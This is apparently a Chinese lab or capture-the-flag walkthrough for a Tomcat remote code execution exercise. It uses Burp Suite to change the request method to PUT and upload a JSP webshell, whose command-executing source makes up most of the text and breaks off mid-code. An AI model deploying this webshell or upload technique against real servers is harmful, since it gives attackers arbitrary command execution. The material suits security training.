Tomcat 远程代码执行漏洞利用(第1题)
难易程度:★★★
题目类型:命令执行
使用工具:FireFox浏览器、burpsuite
1.打开burpsuite,访问网页,截包。
2.send to repeater,把GET改成OPTIONS,查看请求方式。
3.再将OPTIONS改为PUT,加上/1.jsp,在下方写入jsp木马。
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(newInputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"n");}buf.close();} catch (Exception e) {line.append(e.getMessag